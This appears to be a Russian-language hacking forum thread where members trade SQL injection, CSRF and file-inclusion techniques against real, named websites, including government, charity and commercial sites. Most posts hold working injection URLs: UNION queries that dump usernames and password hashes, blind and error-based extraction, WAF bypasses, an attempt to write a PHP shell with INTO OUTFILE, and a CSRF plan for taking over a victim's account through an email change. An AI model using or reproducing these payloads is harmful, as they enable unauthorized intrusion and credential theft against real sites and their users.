есть у меня ряд вопросов по защите/атаке. чисто гипотетических. т.к. в качестве хобби решил заняться защитой информации. всегда меня это привлекало.

дома на 2х ноута стоит windows 7. "лицензия", всегда свежие обновления от мелко-мягких, над этим всем неустанно бдит касперский со свежими базами.

сеть организована следующим образом, есть модем(он же роутер) в режиме моста. внешний IP динамический.

под виртуалкой на одном из ноутов развернут Kali Linux.

собственно эксперементы в локальной сети уже провел все что смог придумать, да и это не особо интересно. т.к. в домашней локалке только я и жена.

опробовал в локальной сети:

1. dns spoofing. рабтает на ура =) в содружестве с s.e.t. дает просто обалденные результаты.

2. social engeneer toolkit(классная вещь в прямых руках)(получил пароль жены минут за 15... не особое достижение при том что я и так все её пароли знаю. но все равно было приятно что метод работает)

3. различные снифера в пачке с подменой ARP таблиц. (работает на ура!)

4. попробовал metasploit/armitage(вещь конечно грамотная, при наличии открытых уязвимостей), но даже при их наличии выпиливается начисто антивирусом(криптовать пэйлоады пробовал, но видимо руки кривые). специально ставил java машину старой версии, с уязвимостю, но попытка эксплуатации была присечена самой виндой... в моем случае софтина оказалось абсолютно не эффективной.

ну это все лирика. в локалке мне по хорошему бояться нечего. в виду ограниченого круга пользователей локальной сети.

меня больше волнуют атаки из вне. допустим меня хотят взломать(получить доступ к почте/рабочей станции разницы нет). чего мне стоит опасаться? мне на ум приходят следующие атаки:

1. средствами СИ(или еще как) меня заманивают на страницу со зловредным скриптом использующем уязвимость в java или flash или браузере и т.д. я перехожу, скрипт и пэйлоад не пропалились антивирусом. у атакующего профит, он имеет полный контроль над системой и всем что в ней есть.

2. опять же средствами СИ меня заманивают на фэйковый сайт и я как полный лохопет сливаю свои пароли от ресурса. (маловероятно конечно, но и такое возможно, вдруг я буду пьян или упорот)

3. мне присылают вредоноса(батник, powerShell, exe'шник, pdf, flash, офисный документ, что еще можно прислать?) которого я конечно запущу в основной системе а не под виртуалкой с XP...

4. XSS на всеми нами любимом mail.ru(ради интереса поискал при помощи 3х разных сканеров из набора kali) нашел 0. но особо ин не старался. да и чревато это.

если вам есть что добавить по поводу атак из вне, дописывайте мне как раз это и интересно. какие еще варианты атак существуют для получения доступа к компу или кражи почты? почта mail.ru или gmail. другим думаю мало кто сейчас пользуется. корпоративная почта не всчет, пусть об этом голова у службы безопасности болит.

меня интересуют ситуации с атакой на конкретную цель. т.е. в данном случае меня. брутфорс не предлагать. это слишком очевидно.

есть сайтик один, в его админке проходя по адресу admin/index.php , сразу в адресной строке показывается /admin/index.php?env=-login:m0--1--s- . Тут получилось добиться пары ошибок:

Если после /admin/index.php?env=- ставить любой символ, допустим123 , то будет ошибка:

Fatal Error: Cannot include "123" - file does not exist in /home/***/public_html/core/kernel/nparser/nparser.php on line 392

Если запрос ставить так /admin/index.php?env=-login:antichat, то получим ошибку:

Fatal Error: Configuration file for prefix antichat is unknown in /home/****/public_html/core/kernel/utility/unit_config_reader.php on line 905

Если вместо admin/index.php?env=-login поставить любые другие символы, то переадресует на /admin/index.php?env=-login:m0--1--s-

Вопрос знатокам, что тут можно попробовать? я так понимаю php inj может быть, с ней не знаком, какие действия попробовать предпринять?

Br@!ns said:
Fatal Error: Cannot include "123" - file does not exist in /home/***/public_html/core/kernel/nparser/nparser.php on line 392


RFI там, если более фильтраций нет.


Если запрос ставить так /admin/index.php?env=-login:antichat, то получим ошибку:
Fatal Error: Configuration file for prefix antichat is unknown in /home/****/public_html/core/kernel/utility/unit_config_reader.php on line 905


Может быть идет через explode разделение, эксперементировать на самом сайте надо. Ссылку в студию!

Здравствуйте, часто встречаются сайты в которых blind inj дает одинаковый ответ при true и false выражениях, но при некорректном sql запросе страница меняется. Использовать time based inj получается далеко не всегда. И что же делать? Я знаю про такой тип атаки - and if((substring(version(),1,1)=5),1,(select 1 union select 2)) При true выражении в первом операнде ошибки не будет. Соответственно при false mysql будет выдавать ошибку - страница поменяется. Все это конечно хорошо руками, но как данное дело настроить на sql map, что бы автоматизировать данный процесс? Мб кто нибудь уже пробовал. Заранее спасибо ребят.

Не могу подобрать кол-во столбцов


Code:
http://crimea.ua/category.php?id=-18+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18+--+

знатоки подскажите

Unknowhacker said:
Не могу подобрать кол-во столбцов

Code:
http://crimea.ua/category.php?id=-18+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18+--+

знатоки подскажите


А почему вы считаете, что здесь есть инъекция? Ни один тест её не подтверждает, тем более мы знаем по именам функций что это mysql.

А вот на соседней странице она имеется:


Code:
http://crimea.ua/section.php?CatId=9&SecId=75+and+1=2%29+union+select+1,2,3,version%28% 29,5+--+

салют, у меня такая проблема при попытке использовать XSRF, не могу сделать автовыполнения запроса так как в строке нет параметра name который должен быть вписан тут можете помочь? заранее спс

nikitos2020 said:
салют, у меня такая проблема при попытке использовать XSRF, не могу сделать автовыполнения запроса так как в строке нет параметра name который должен быть вписан тут можете помочь? заранее спс


Если вы используете document.forms, вам надо задавать name форме или искать её по id. При статическом задании более-универсален такой варинт:


PHP:
...

document.getElementById('test').submit();

XAMEHA said:
Если вы используете
document.forms
, вам надо задавать name форме или искать её по id. При статическом задании более-универсален такой варинт:

PHP:
...

document.getElementById('test').submit();









не бро не прокатило((( может сам попробуешь? https://euroits.com/profile там зарегаться придётся, уязвимость в редактировании профиля, если подставить своё произвольно значение name или id форма несрабатывает, тебя просто перебрасывает на страницу изменения данных, но сами данные не изменины(

P.S при регистрации в поле кошелёк можно ввести "U1234567". попробуй заюзать XSRF если тебе не трудно. у меня на всех таких проектов получалось, но вот с этим беда(

вот сама форма :


PHP:












Имя







PM кошел ек













Фамилия









Skype















E-mail





                                   



ICQ



































   



Старый пароль





Новый пар оль





   

Повтори те новый пароль

Можно тестовый аккаунт, обязательно посмотрю?Судя по этой форме, что вы скинули, при отсутствии защиты, статически будет это так:


PHP:






















document.getElementById('test').submit();





Предполагаю, что возможно сменить пароль не задавая старый нереально.

XAMEHA said:
Можно тестовый аккаунт, обязательно посмотрю?
Судя по этой форме, что вы скинули, при отсутствии защиты, статически будет это так:

PHP:






















document.getElementById('test').submit();





Предполагаю, что возможно сменить пароль не задавая старый нереально.


)) так в этом и фишка бро) нужно всеголишь изменить mail, и начинаются танцы))) как только у жертвы поменяется почта, ты заходишь на сайт жмём "востоновить" после вводим мэил который поменялся у жертвы... к нам на почту приходит его ник и пароль (который стоит в настоящие время)) то есть пароль не сбрасывается а отправляется существующий в настоящий момент)) ах да вот аккаунт зарегал попробуй: логин: XAMEHA пароль: qwe123

nikitos2020 said:
нужно всеголишь изменить mail, и начинаются танцы))


Но ведь этот ресурс не позволяет менять мыло даже у себя, оно не сохраняется в профиле

Кошелек, контакт, данные - да, а вот mail - нет. Возможно вам стоит выполнять какие-то другие действия?

В общем есть сукля, но раскрутить её не получается


Code:
http://shimanomarket.com.ua/products.php?category=53&page=0&special=show&order=-dprice%29%27+union+select+1,2,3+--+

и вторая


Code:
http://www.aerosol.com.ua/products.php?id=3%27

но если дописать union+select выбьет = Not Acceptable

http://linzapro.ru/feedback/

пост

fsearch=777[SQL]&subsearch=1

не буду врать - нашел через софт, но руками никак...!

Always said:
http://linzapro.ru/feedback/
пост
fsearch=777[SQL]&subsearch=1
не буду врать - нашел через софт, но руками никак...!


Что за софт?

Блиндом крутится

http://linzapro.ru/bigpic_log.php?pid=109452%20and%20if%28Length%28%2 8select%20distinct%20table_name%20from%20%60inform ation_schema%60.tables%20where%20table_schema%3D0x 6C696E7A6170726F%20limit%201%2C1%29%29%3D21%2CBENC HMARK%28267134%2CMD5%280x41%29%29%2C0%29

Или так: post-запрос

http://i052.radikal.ru/1308/83/c27b1d1750fe.jpg

Отсечь часть UPDATE запроса

Добрый день,

на одном сайте столкнулся с заполнением анкеты, и в одном поле, случайно задал вместе с числом знак %, после чего при сохранения профиля мне выдало следующее:


Code:
You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use
near ';, abgl= 2, a_t = 2 WHERE id = 87637 AND user_id = 114239' at line 1 ---->

UPDATE you_profil SET t_raum_v= '09/2009 - 09/2012', zeitraum_von = '2009-9-00',
t_raum_b= '2012-9-00', beruf = '2', a_ort= 'Harward', e_znote= 'Bachelor',
notiz= 'Some text', note = 1.9%;, abgl= 2, a_t= 2 WHERE id = 87637 AND user_id = 114239

Пробывал экранировать остаток запроса после поля note = 1,9%-- и note = 1,9/** , но не выходит. Подскажите как можно закомментировать остаток запроса, что бы он не исполнялся. Вместо него хочу добавить свой запрос.

er9j6@ said:
Что за софт?
Блиндом крутится
http://linzapro.ru/bigpic_log.php?pid=109452%20and%20if%28Length%28%2 8select%20distinct%20table_name%20from%20%60inform ation_schema%60.tables%20where%20table_schema%3D0x 6C696E7A6170726F%20limit%201%2C1%29%29%3D21%2CBENC HMARK%28267134%2CMD5%280x41%29%29%2C0%29




YaBtr said:
Или так:
post
-запрос
http://i052.radikal.ru/1308/83/c27b1d1750fe.jpg



никак...!

Приветствую всех.

При запросе site.ru:3306 скачивается файл а в нем версия мускуля

F 5.0.32-Debian_7etch5 нz J>8>m**0 ,ў! U:a\)VU*mg@F 
яBad handshake

настройки мускула неправильные?

дальше что нить можно с этим сделать?

есть пароли админов но при вводе они не проходят ...

проверка по айпи может?

или еще как нить блокирует ?

ishenko said:
есть пароли админов но при вводе они не проходят ...
проверка по айпи может?
или еще как нить блокирует ?


Привязка пользователя к конкретному хосту вполне может быть, или там у каждого пользователя хост равен localhost. Если там нет phpmyadmin'a, или ему подобному, подключиться удаленно не получится.

Я уже задолбался подбирать столбцы


Code:
http://www.smz.donetsk.ua/index.php?id=2782&show=news&newsid=-108450%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 +--+

http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+and+1=1+union+select+231,223+--+

http://www.ntvplus.ru/channels/channel.xl?id=45409%27

народ, скажите что не так

Unknowhacker said:
Я уже задолбался подбирать столбцы

Code:
http://www.smz.donetsk.ua/index.php?id=2782&show=news&newsid=-108450%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 +--+

http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+and+1=1+union+select+231,223+--+

http://www.ntvplus.ru/channels/channel.xl?id=45409%27

народ, скажите что не так


SQL-injection Полный faq от Dr.Zero. Пункт "подбор столбцов"

http://www.smz.do[lalala]netsk.ua/index.php?id=2782&show=news&newsid=108450 order by 3 -- 1

Ravenous said:
SQL-injection Полный faq от Dr.Zero. Пункт "подбор столбцов"
http://www.smz.do[lalala]netsk.ua/index.php?id=2782&show=news&newsid=108450 order by 3 -- 1


Разочарование при вводе version() - I don't like you...

хакир ну и чо ? то что фильт на version() это еще ничего не значит, самое главное то нормально выводится. и саму версию бд можно вывести так @@version

Скажите что не так?

http://www._____.com/news.php?newsid=-397+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6,7,8,9+from+phpbb_users

Пишет Query failed: Table 'trunovc7_loy.phpbb_users' doesn't exist нет таблицы

5.0.92-log:trunovc7_tr@localhost:trunovc7_loy

Нашел единственную уязвимость на сайте.Начал анализ

Нашел мне такую базу данных, в хавидж жму Get tables внутри ничего не вылезает, вот название Current DB: }NLrxf}x{f} ffw иероглифы какие то и скобки.Скажите что делать?

danil7493 said:
Скажите что не так?
http://www._____.com/news.php?newsid=-397+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6,7,8,9+from+phpbb_users
Пишет Query failed: Table 'trunovc7_loy.phpbb_users' doesn't exist нет таблицы
5.0.92-log:trunovc7_tr@localhost:trunovc7_loy




HTML:
http://www.trunov.com/news.php?newsid=-237+UNION+SELECT+1,CONCAT_ws(0x3a,username,user_pa ssword),3,4,5,6,7,8,9+FROM+trunovc7_forum.phpbb_us ers+LIMIT+1,1--&page=1

danil7493 said:
Скажите что не так?
http://www._____.com/news.php?newsid=-397+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6,7,8,9+from+phpbb_users
Пишет Query failed: Table 'trunovc7_loy.phpbb_users' doesn't exist нет таблицы
5.0.92-log:trunovc7_tr@localhost:trunovc7_loy


Зачем скрывать доменное имя, если в большинстве случаев оно схоже с именем юзера или базы?! В Вашем случае, я так понимаю, http://www.trunov.com

Далее несложно определить, что курутиться несколько баз данных:

помимо information_schema и trunovc7_loy есть еще trunovc7_forum, которая и содержит необходимую Вам таблицу, то есть запрос примет вид ...from trunovc7_forum.phpbb_users.

И еще момент: колонки с названием passwordнет в таблице phpbb_users, есть user_password.

Итог:


http://www._____.com/news.php?newsid=-397+union+select+1,2,group_concat(0x3a,username,us er_password),4,5,6,7,8,9+from+trunovc7_forum.phpbb _users --+

Помогите пожалуйста сначало я вывел базу, она не открывалась.Теперь ничего не делается.Люди посоветуйте через Havij иньекцию делал

вот тут уязвимость

http://rp-gameworld.ru/index.php?c=registration&action=reg

migjee said:
Помогите пожалуйста сначало я вывел базу, она не открывалась.Теперь ничего не делается.Люди посоветуйте через Havij иньекцию делал
вот тут уязвимость
http://rp-gameworld.ru/index.php?c=registration&action=reg


Раскрытие путей же. Где тут инъекцию увидел?

Code:
http://www.redcross.org.ua/modules/news/index.php?id=-999

Ошибка вызывается только при дефисе перед переменной, при подбирании столбцов всё рушиться, обойти пробелы /**/ не получается..

Текст ошибки: SELECT * FROM aadm_menu WHERE id=: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

SECOND QUESTION ============================


Code:
http://www.amnu.gov.ua/index.php?p=calendar&action=events&show=public&sys_monat=08&sys_jahr=2013&sys_tag=24+union+select+1+--+&area=1#999

Выдаёт следующие:


Code:
Notice: Use of undefined constant HTTP - assumed 'HTTP' in /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Response.php on line 70 Warning: Cannot modify header information - headers already sent by (output started at /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Response.php:70) in /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Response.php on line 71
Warning: Cannot modify header information - headers already sent by (output started at /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Response.php:70) in /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Redir.php on line 22

что-нибудь может с этого получится

3 ==== вот это ещё интересно


Code:
http://ua.oriflame.com/utils/messages/message.jhtml?textKey=conference_not_available'&_requestid=406406

Error: Could not find resourcestring: key: conference_not_available' bundleName: com.oriflame.bundles.oriLiteralBundle

Тут вообще выходит всплывающее окно и не даёт дальше крутить


Code:
http://www.goldnsilverfactory.com/sub.php?db_cid=178%27
http://www.titanchair.ca/sub.php?db_cid=2%27

Unknowhacker said:

Code:
Тут вообще выходит всплывающее окно и не даёт дальше крутить
[CODE]http://www.goldnsilverfactory.com/sub.php?db_cid=178%27
http://www.titanchair.ca/sub.php?db_cid=2%27



Здесь фильтр, но select+union пропускает:

1 случай: +union+select+1,2,3,4,5,6,7,8,9,10+--+

2 случай: +union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+

В обоих случаях поле 2 - принтабельное.

Можно ли здесь что-то сделать и в каком направлении рыть?


Code:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=1'

exstreme said:
Можно ли здесь что-то сделать и в каком направлении рыть?

Code:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=1'



Правильно определили уязвимый параметр usr_id.

Далее подбираем количество столбцов:

+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19+--+

Версия "5.1.49-Max-log"

Вот в этом направлении.

exstreme said:
Можно ли здесь что-то сделать и в каком направлении рыть?

Code:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=1'



Вот держи раскрученная.. я так понял.. новичок..


Code:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=-1+union+select+1,2,3,4,5,6,7,%28select%28@x%29from %28select%28@x:=0x00%29,%28select%28null%29from%28 rh_tppg.usr%29where%280x00%29in%28@x:=concat%28@x, 0x3c62723e,lognme,0x3a,pwd%29%29%29%29x%29,9,10,11 ,12,13,14,15,16,17,18,19+--+

P.S См. ниже графа "Очки" И уберите пробелы в URL

Unknowhacker said:
Вот держи раскрученная.. я так понял.. новичок..


Спс, есть немного такое, у меня с union не прокатывало, я что-то и подумал, что здесь версия

[QUOTE="exstreme"]
exstreme said:
Спс, есть немного такое, у меня с union не прокатывало, я что-то и подумал, что здесь версия

p.s. согласно руководству по mysql переди послезнака комменария "--" cтавится пробел, т.е. +--+

есть такое, спасибо, думал (%28) что пробел.


Code:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=-1+union+select+1,2,3,4,5,'%3C?php%20echo%20%22test %22;?%3E',7,8,9,10,11,12,13,14,15,16,17,18,19+INTO +OUTFILE+'tested.php'+--+

А это почему не срабатывает?

посмотрел я на столбцы таблицы, и так понимаю они находятся в отдельной таблице, а кроме того на сайте как минимум присутствуют джумловские таблицы. Ну и собственно вопрос, можно ли как-то к ним подключиться или только в пределах этой таблицы?

exstreme said:
есть такое, спасибо, думал (%28) что пробел.

Code:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=-1+union+select+1,2,3,4,5,'%3C?php%20echo%20%22test %22;?%3E',7,8,9,10,11,12,13,14,15,16,17,18,19+INTO +OUTFILE+'tested.php'+--+

А это почему не срабатывает?
посмотрел я на столбцы таблицы, и так понимаю они находятся в отдельной таблице, а кроме того на сайте как минимум присутствуют джумловские таблицы. Ну и собственно вопрос, можно ли как-то к ним подключиться или только в пределах этой таблицы?


Принтабельные колонки подразумевают ЧТЕНИЕ, а НЕ ВЫПОЛНЕНИЕ запрашиваемых данных.

Хотя я встречал исключения. Очень-очень-очень редко.

Максимум что тут можешь выкопать - это опять же SiXSS посредством пассивной XSS в клиентском браузере. Но это опять же, выполняется на клиенте, а не на сервере.

BigBear said:
Принтабельные колонки подразумевают
ЧТЕНИЕ
, а
НЕ ВЫПОЛНЕНИЕ
запрашиваемых данных.


То есть шелл залить не удастся? А то смотрю, test.php там уже присутсвует; про колонки я имел в виду сами таблицы SQL, а не выводимые HTML-данные;

к примеру название этой бд rh_tppg, могу ли я вывести данные с других бд? вот про это я имел в виду

exstreme said:
То есть шелл залить не удастся? А то смотрю, test.php там уже присутсвует; про колонки я имел в виду сами таблицы SQL, а не выводимые HTML-данные;
к примеру название этой бд rh_tppg, могу ли я вывести данные с других бд? вот про это я имел в виду


У юзера бд слишком кастрированные права, файла быть не может, его и нет.

Из доступных там бд всего 2 - текущая и information_schema, так что выводить там больше нечего.


Code:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=-1 union select 1,2,3,4,@a,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from(select @a:=0,(select 1 from information_schema.tables where TABLE_SCHEMA='rh_tppg' and (@a:=concat(@a,";",TABLE_NAME))))b -- w

Например вывод таблиц из текущий базы.

Code:
http://kozyrlife.ictv.ua/ru/index/read-news/id/1485524%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16+--+

http://www.scrutineer.ru/results.php?id=3+and+1=1%27+union+select+1,2,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+

http://pridb.gdcb.iastate.edu/results.php?searchby=PDB_ID%27+union+select+1,2,3, 4,5,6,7,8,9,10,11,12+--+&q=3J12&interactiontype=dist&distcutoff=5.0

http://tnk.ua/motorist/shop_promo/2013/41%27/ выбивает # article это имеет какое-либо значение к инъекции

P.S Ряд сайтов, которые реагируют на кавычку, но при это скрыт отчёт об ошибке и неизвестно .. есть ли она вообще здесь, стоит ли столбцы подбирать, а то вот YaBtr нашёл аж 407.. это ж чокнуться можно, ладно, если ORDER BY оператором при условии, что отчёт об ошибке не скрыт...

Ребят, помогите пожалуйста советом кто разбирается в скулях. БД MySQL 5.1.

Ситуация такая:

Уперся в глухой тупик при разборе Blind SQL injection, по типу true:false. Запрос исполнился - страница загрузилась как надо; запрос неверный - страница осталась пустой. Ручками в принципе нашел все таблицы что надо - оказались обычные джумловские, версии 1.5.15.

Сама скуля оказалась в компоненте virtuemart. Сам запрос на проверку уязвимости выглядит так:


Code:
http://site.ru/administrator/components/com_virtuemart/index.php?%20category_id=&page=shop.browse&option=com_virtuemart&Itemid=1&keyword1=hand&search%20_op=and&keyword2=&search_limiter=anywhere&search=Search&search_category=0 or 1=1 --

На "and" выдает ошибку (пустая страница), т.е. проходит только через "or". UNION, INSERT, UPDATE, кавычки и апострофы - в запросах также не проходят. Замена "and" или кавычек - hex кодом результата также не дает. Насчет инфы по БД, определить удалось только версию Version(), остальные функции: USER(), USER_session(), DATABASE() - определяет как ошибочные.

Все запросы на выборку делаются примерно так:


Code:
...&search_category=0 or (SELECT 1 FROM jos_users WHERE ord(substr(password,1,1))>=49 limit 0,1)=1 --

и так тоже работает

...&search_category=0 or (SELECT 1 FROM jos_users WHERE substr(password,1,1)>=0х6d limit 0,1)=1 --

Т.е. можно сравнивать удачно как аскии код, так и hex код подбираемого символа. (Кэп)

В случае сравнения ASCII кодов интересно то, что сравнивать можно только по ">=" или "=". Знак меньше

Также есть доступ к php.ini. Если надо будет, могу подсмотреть какие-то параметры.


Code:
magic_quotes_gpc Off Off
safe_mode Off Off
sql.safe_mode Off Off
track_errors Off Off
display_errors Off Off
display_startup_errors Off Off
allow_url_fopen On On
allow_url_include Off Off

ЗЫ Подобные коллизиции пока в 2ух случаях нашел.

Code:
http://www.belavtostrada.by/show.php?category=6'+order+by+1+--+

Всего один столбец. при вводе оператора UNION - Hacker attemp!

Unknowhacker said:

Code:
http://www.belavtostrada.by/show.php?category=6'+order+by+1+--+

Всего один столбец. при вводе оператора UNION - Hacker attemp!




http://www.belavtostrada.by/show.php?category=6'and version()+like+'%5%'+--+


фильтр на select

Unknowhacker said:

Code:
http://www.belavtostrada.by/show.php?category=6'+order+by+1+--+

Всего один столбец. при вводе оператора UNION - Hacker attemp!


Не при UNION, а при SELECT

6'+and+user()+like+'belav%'--+

дальше сам бруть

Unknowhacker said:

Code:
http://kozyrlife.ictv.ua/ru/index/read-news/id/1485524%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16+--+
http://krasnodar.rtrn.ru/news.asp?view=19418%27+union+select+1,2,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20+--+ взгляни плз

http://www.tppkuban.ru/search.php?sovpad=1&registr=1&gogo=%E8%F1%EA%E0%F2%FC%27+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27+--+

http://www.scrutineer.ru/results.php?id=3+and+1=1%27+union+select+1,2,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+

http://pridb.gdcb.iastate.edu/results.php?searchby=PDB_ID%27+union+select+1,2,3, 4,5,6,7,8,9,10,11,12+--+&q=3J12&interactiontype=dist&distcutoff=5.0

http://tnk.ua/motorist/shop_promo/2013/41%27/ выбивает # article это имеет какое-либо значение к инъекции

P.S Ряд сайтов, которые реагируют на кавычку, но при это скрыт отчёт об ошибке и неизвестно .. есть ли она вообще здесь, стоит ли столбцы подбирать, а то вот YaBtr нашёл аж 407.. это ж чокнуться можно, ладно, если ORDER BY оператором при условии, что отчёт об ошибке не скрыт...


Непонятных моментов будет меньше, если разберешься с различием в раскрутке инъекций в строковыхи числовых уязвимостых параметрах:

http://www.scrutineer.ru/results.php?id=3+order+by+8+--+

Подскажите, как в данном случае посимвольно подобрать имя базы данных таблицы через оператора CHAR


Code:
http://ukrcrewing.com.ua/agency%27and%28select*from%28select%28name_const%2 8version%28%29,1%29%29,name_const%28version%28%29, 1%29%29a%29and%27

Unknowhacker said:
Подскажите, как в данном случае посимвольно подобрать имя базы данных таблицы через оператора CHAR


Вы уверены, что вам надо перебирать именно так, если возможно решить задачу более-результативным путем?

К примеру получаем вывод имени базы данных через error-based, но немного другого типа:


PHP:
http://ukrcrewing.com.ua/agency%27or%201%20group%20by%20concat%28database%2 8%29,floor%28rand%280%29*2%29%29%20having%20min%28 0%29%20--%20

Интересная SQL


Code:
seafarer.od.ua/?page=study&course=2+order+by+7+--+

Но при операторах UNION+SELECT выдаёт ошибку будто кол-во столбцов неверно.

Unknowhacker said:
Интересная SQL

Code:
seafarer.od.ua/?page=study&course=2+order+by+7+--+

Но при операторах
UNION+SELECT
выдаёт ошибку будто кол-во столбцов неверно.


Warning: ibase_query(): Dynamic SQL Error SQL error code = -104 Token unknown - line 1, column 103 group in /var/www/lesozavodsk/study.inc on line 11


PHP:
http://seafarer.od.ua/?page=study&course=2+union+select+1,2,3,4,5,6,7+from+rdb$relat ions+--+

нужно обойти фильтр не понятно на что, толи TABLE_NAME; INFORMATION_SCHEMA


Code:
http://www.web-compas.ru/c.php?id=-34%27+union+/*!select*/+1,version%28%29,3,4,5,6,7+--+

на select вроде обошёл

Unknowhacker said:
нужно обойти фильтр не понятно на что, толи TABLE_NAME; INFORMATION_SCHEMA

Code:
http://www.web-compas.ru/c.php?id=-34%27+union+/*!select*/+1,version%28%29,3,4,5,6,7+--+

на select вроде обошёл



Мысль у тебя правильная:


http://www.web-compas.ru/c.php?id=-34'+union+/*!select*/+1,/*!group_concat(table_name)*/,3,4,5,6,7
+/*!from*/+/*!information_schema.tables*/+/*!where*/+/*!table_schema*/ = /*!database()*/+--+

YaBtr said:
Мысль у тебя правильная:


Точно, мне показалось, что дальше не прокатит ..

Я вот ещё нашёл


Code:
http://tochka.cn.ua/index.php?cat=0%27+order+by+9+--+
http://www.autoonline.com.ua/news/index.php?id=4736+order+by+9+--+

но при UNION+SELECT = показывает обычную страницу даже есть кол-во столбцов я увеличу.

Unknowhacker said:
Точно, мне показалось, что дальше не прокатит ..
Я вот ещё нашёл

Code:
http://tochka.cn.ua/index.php?cat=0%27+order+by+9+--+
http://www.autoonline.com.ua/news/index.php?id=4736+order+by+9+--+

но при UNION+SELECT = показывает обычную страницу даже есть кол-во столбцов я увеличу.


Здесьtime based

http://www.autoonline.com.ua/news/index.php?id=4736+/*!and*/+/*!if(substr(version(),1,1)=5,SLEEP(5),1)*/+--+

YaBtr said:
Здесь
time based
http://www.autoonline.com.ua/news/index.php?id=4736
+/*!and*/+/*!if(substr(version(),1,1)=5,SLEEP(5),1)*/+--+


мммм,зачем тайм..


http://www.autoonline.com.ua/news/index.php?id=-4736/**/UNION/**//*!SELECT*//**/1,2,version%28%29,4,5,6,7,8,9%23




http://www.autoonline.com.ua/news/index.php?id=-4736/**/UNION/**//*!SELECT*//**/1,2,/*!table_name*/,4,5,6,7,8,9/**//*!from*//**/information_schema.tables/**/limit/**/N,1%23

HATA4OK, спасибо, но я уже сделал по другому.


Code:
http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+/*!union*/+/*!select*/+1,2+--+

Мне не даёт покоя эта ссылка, но как я не крутил не выводится номер столбца -(

Unknowhacker said:
HATA4OK
, спасибо, но я уже сделал по другому.

Code:
http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+/*!union*/+/*!select*/+1,2+--+

Мне не даёт покоя эта ссылка, но как я не крутил не выводится номер столбца -(


И не выведешь. Тут слепая скуля.

Кстати тут удобно использовать метод more1row

Смотри сам:


Code:
http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=4,1,(select +1+union+select+2))

No error

http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=5,1,(select +1+union+select+2))

Error

BigBear said:
И не выведешь. Тут слепая скуля.
Кстати тут удобно использовать метод
more1row
Смотри сам:

Code:
http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=4,1,(select +1+union+select+2))

No error

http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=5,1,(select +1+union+select+2))

Error



А тем более с четвёрки не вытащишь -(

Кто может сказать, что за реагирование на *1


Code:
http://pereprava.com.ua/index.php?id=1*1

Unknowhacker said:
А тем более с четвёрки не вытащишь -(
Кто может сказать, что за реагирование на
*1

Code:
http://pereprava.com.ua/index.php?id=1*1




http://pereprava.com.ua/index.php?id=1*1 (Вывод страницы 1)

http://pereprava.com.ua/index.php?id=1*3 (Вывод страницы 3)

Отсюда следует,что, ВОЗМОЖНО, здесь присутствует инъекция

Очередной фильтр SELECT


Code:
http://johnyboy.ru/?page=news&newsid=-999+union+/*!select*/+1,2,3,4,5,6+--+

но зараза оператора AND никак не хочет пропускать /*!and*/ и методом more1row воспользоваться не получится.

Unknowhacker said:
Очередной фильтр
SELECT

Code:
http://johnyboy.ru/?page=news&newsid=-999+union+/*!select*/+1,2,3,4,5,6+--+

но зараза оператора AND никак не хочет пропускать /*!and*/ и методом
more1row
воспользоваться не получится.


Так используйте что ни будь еще - логические операторы, арифметические, побитовые, сравнения...

Там, помимо основного WAF-а еще несколько фильтров, что они только не фильтруют...

Возможно такой синтаксис:


PHP:
130++div+++((5)+&255)+



Но до раскрутки еще далеко, с полным фильтром на select ничего не получится.

